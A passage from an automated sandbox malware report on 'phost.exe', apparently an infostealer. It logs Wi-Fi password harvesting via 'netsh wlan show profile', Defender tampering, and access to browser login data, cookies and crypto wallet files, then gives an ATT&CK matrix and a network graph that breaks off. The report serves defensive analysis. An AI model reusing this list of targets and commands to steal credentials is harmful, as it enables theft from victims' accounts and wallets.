              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF62CC7D080
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC95EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF62CC95EEC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,105_2_00007FF6BBCF48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\phost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1702090319.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2178616618.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2170059092.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2166479596.000001AE1E122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2173409124.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2175138187.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1680237831.000001C32AC85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1680237831.000001C32AC83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2176893974.000001AE1D044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2172415408.000001AE1D7E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: phost.exe PID: 3220, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI32202\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR
              Source: phost.exe, 00000001.00000003.1842261128.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets.
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fJaxx
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backupsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storageJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_stateJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archivedJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1702090319.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2178616618.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2170059092.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2166479596.000001AE1E122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2173409124.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2175138187.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1680237831.000001C32AC85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1680237831.000001C32AC83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2176893974.000001AE1D044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2172415408.000001AE1D7E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: phost.exe PID: 3220, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI32202\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts1
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              4
              Disable or Modify Tools
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              Security Account Manager58
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              21
              Obfuscated Files or Information
              NTDS261
              Security Software Discovery
              Distributed Component Object Model1
              Clipboard Data
              5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets2
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials151
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry
              Proc Filesystem1
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574326 Sample: phost.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 72 ip-api.com 2->72 74 discord.com 2->74 76 blank-c9yfy.in 2->76 84 Found malware configuration 2->84 86 Sigma detected: Capture Wi-Fi password 2->86 88 Multi AV Scanner detection for submitted file 2->88 90 11 other signatures 2->90 11 phost.exe 22 2->11         started        15 svchost.exe 2->15         started        signatures3 process4 dnsIp5 64 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->64 dropped 66 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->66 dropped 68 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->68 dropped 70 16 other files (none is malicious) 11->70 dropped 116 Modifies Windows Defender protection settings 11->116 118 Adds a directory exclusion to Windows Defender 11->118 120 Tries to harvest and steal WLAN passwords 11->120 122 2 other signatures 11->122 18 phost.exe 107 11->18         started        82 127.0.0.1 unknown unknown 15->82 file6 signatures7 process8 dnsIp9 78 ip-api.com 208.95.112.1, 49731, 49744, 80 TUT-ASUS United States 18->78 80 discord.com 